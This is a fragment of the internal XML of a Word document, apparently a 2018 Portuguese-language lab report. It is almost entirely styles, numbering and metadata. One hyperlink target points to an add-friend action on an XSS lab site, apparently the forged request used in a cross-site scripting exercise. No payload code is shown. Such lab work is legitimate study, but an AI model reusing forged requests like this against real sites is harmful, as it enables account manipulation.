  </w:p>
  <w:p w14:paraId="69F72FCD" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr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FDAD1D" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:right="336" w:firstLine="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="02E6F8F2" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="002957DD">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr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989A27" w14:textId="77777777" w:rsidR="00475DDA" w:rsidRDefault="00475DDA">
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:righ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308718" w14:textId="77777777" w:rsidR="00617016" w:rsidRDefault="00617016">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="418D1472" w14:textId="77777777" w:rsidR="00617016" w:rsidRDefault="006170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18602A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="815E8A12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AA477D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E64E41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854185"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DF8F6B6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3C65E68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7E4A1AA"/>
    <w:lvl w:ilvl="0" w:tplc="08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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="474900FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92BE0582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4DF62898"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0DCF11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CC2156"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95BA83C2"/>
    <w:lvl w:ilvl="0" w:tplc="0816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6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2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5DDA"/>
    <w:rsid w:val="00000CFC"/>
    <w:rsid w:val="00015AC5"/>
    <w:rsid w:val="000613CE"/>
    <w:rsid w:val="0008199D"/>
    <w:rsid w:val="000D165C"/>
    <w:rsid w:val="000E5813"/>
    <w:rsid w:val="000F1FFF"/>
    <w:rsid w:val="00131EA6"/>
    <w:rsid w:val="00137795"/>
    <w:rsid w:val="001A507E"/>
    <w:rsid w:val="001B09F6"/>
    <w:rsid w:val="002035AF"/>
    <w:rsid w:val="0021416A"/>
    <w:rsid w:val="00220AB5"/>
    <w:rsid w:val="00292E14"/>
    <w:rsid w:val="002957DD"/>
    <w:rsid w:val="002A6391"/>
    <w:rsid w:val="002C569B"/>
    <w:rsid w:val="0032723C"/>
    <w:rsid w:val="00360A7C"/>
    <w:rsid w:val="003830AE"/>
    <w:rsid w:val="00402622"/>
    <w:rsid w:val="004046E4"/>
    <w:rsid w:val="00442818"/>
    <w:rsid w:val="0046220C"/>
    <w:rsid w:val="00464EF3"/>
    <w:rsid w:val="00475DDA"/>
    <w:rsid w:val="004B106B"/>
    <w:rsid w:val="004F32F8"/>
    <w:rsid w:val="004F6365"/>
    <w:rsid w:val="005B3F06"/>
    <w:rsid w:val="005C588D"/>
    <w:rsid w:val="005E355E"/>
    <w:rsid w:val="006048CD"/>
    <w:rsid w:val="00617016"/>
    <w:rsid w:val="006370B0"/>
    <w:rsid w:val="0064542F"/>
    <w:rsid w:val="00655BE2"/>
    <w:rsid w:val="006B274B"/>
    <w:rsid w:val="006E4B48"/>
    <w:rsid w:val="00710576"/>
    <w:rsid w:val="007404C9"/>
    <w:rsid w:val="0075542A"/>
    <w:rsid w:val="007810C5"/>
    <w:rsid w:val="007D1719"/>
    <w:rsid w:val="007F3B0D"/>
    <w:rsid w:val="00804DC0"/>
    <w:rsid w:val="009303F6"/>
    <w:rsid w:val="00965330"/>
    <w:rsid w:val="009D061E"/>
    <w:rsid w:val="009F257E"/>
    <w:rsid w:val="00A200FD"/>
    <w:rsid w:val="00A250B4"/>
    <w:rsid w:val="00A34CA8"/>
    <w:rsid w:val="00A974D5"/>
    <w:rsid w:val="00AC7F1D"/>
    <w:rsid w:val="00AF7A01"/>
    <w:rsid w:val="00B05EB3"/>
    <w:rsid w:val="00B36A87"/>
    <w:rsid w:val="00B52D72"/>
    <w:rsid w:val="00B95F7B"/>
    <w:rsid w:val="00BA0F97"/>
    <w:rsid w:val="00BA1852"/>
    <w:rsid w:val="00BC657B"/>
    <w:rsid w:val="00BF3CF7"/>
    <w:rsid w:val="00C54E78"/>
    <w:rsid w:val="00CA3FD7"/>
    <w:rsid w:val="00D0796F"/>
    <w:rsid w:val="00D7514A"/>
    <w:rsid w:val="00D86036"/>
    <w:rsid w:val="00D93B79"/>
    <w:rsid w:val="00DA0FA9"/>
    <w:rsid w:val="00DB6F0E"/>
    <w:rsid w:val="00DD20DA"/>
    <w:rsid w:val="00DE748E"/>
    <w:rsid w:val="00E2612F"/>
    <w:rsid w:val="00E36C87"/>
    <w:rsid w:val="00E45214"/>
    <w:rsid w:val="00E478FD"/>
    <w:rsid w:val="00E610F9"/>
    <w:rsid w:val="00E95C26"/>
    <w:rsid w:val="00F15358"/>
    <w:rsid w:val="00FA1A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14ACE0"/>
  <w15:docId w15:val="{D65A72B6-270C-4792-9ACD-8451D96F5F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162" w:line="258" w:lineRule="auto"/>
      <w:ind w:right="337" w:firstLine="417"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Carter"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="3"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cabealho2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Cabealho2Carter"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="3"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28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2Carter">
    <w:name w:val="Cabeçalho 2 Caráter"/>
    <w:link w:val="Cabealho2"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Carter">
    <w:name w:val="Título 1 Caráter"/>
    <w:link w:val="Ttulo1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice1">
    <w:name w:val="toc 1"/>
    <w:hidden/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="19" w:line="346" w:lineRule="auto"/>
      <w:ind w:left="25" w:right="345" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice2">
    <w:name w:val="toc 2"/>
    <w:hidden/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="99"/>
      <w:ind w:left="308" w:right="345" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PargrafodaLista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00292E14"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cabealhodondice">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00000CFC"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:ind w:left="0" w:firstLine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ndice3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00000CFC"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="440" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hiperligao">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B95F7B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1B09F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846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3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7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65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75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57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05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89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1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82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97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8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://www.xsslabelgg.com/action/friend=47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://www.example.com" TargetMode="External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://www.soplab.com" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId45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6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F7D590-5B4B-4D4E-97E6-6898C8A469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507</TotalTime>
  <Pages>1</Pages>
  <Words>1450</Words>
  <Characters>7836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Inês</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Inês</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <cp:lastPrinted>2018-12-24T13:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-18T23:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-24T13:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>